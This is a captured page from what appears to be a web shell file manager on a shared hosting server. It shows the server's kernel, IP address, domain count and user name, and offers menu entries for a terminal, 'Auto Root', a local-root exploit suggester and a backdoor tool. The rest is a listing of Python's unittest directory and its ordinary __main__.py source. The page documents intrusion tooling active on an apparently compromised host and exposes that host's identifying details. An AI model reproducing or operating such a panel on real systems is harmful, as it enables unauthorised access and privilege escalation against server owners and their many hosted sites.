Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python312 /
lib64 /
python3.12 /
unittest /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2026-09-04 12:14
__init__.py
3.41
KB
-rw-r--r--
2026-08-17 15:23
__main__.py
472
B
-rw-r--r--
2026-08-17 15:23
_log.py
2.68
KB
-rw-r--r--
2026-08-17 15:23
async_case.py
5.35
KB
-rw-r--r--
2026-08-17 15:23
case.py
56.18
KB
-rw-r--r--
2026-08-17 15:23
loader.py
20.62
KB
-rw-r--r--
2026-08-17 15:23
main.py
11.71
KB
-rw-r--r--
2026-08-17 15:23
mock.py
103.83
KB
-rw-r--r--
2026-08-17 15:23
result.py
8.92
KB
-rw-r--r--
2026-08-17 15:23
runner.py
10.13
KB
-rw-r--r--
2026-08-17 15:23
signals.py
2.35
KB
-rw-r--r--
2026-08-17 15:23
suite.py
13.2
KB
-rw-r--r--
2026-08-17 15:23
util.py
5.09
KB
-rw-r--r--
2026-08-17 15:23
Save
Rename
"""Main entry point""" import sys if sys.argv[0].endswith("__main__.py"): import os.path # We change sys.argv[0] to make help message more useful # use executable without path, unquoted # (it's just a hint anyway) # (if you have spaces in your executable you get what you deserve!) executable = os.path.basename(sys.executable) sys.argv[0] = executable + " -m unittest" del os __unittest = True from .main import main main(module=None)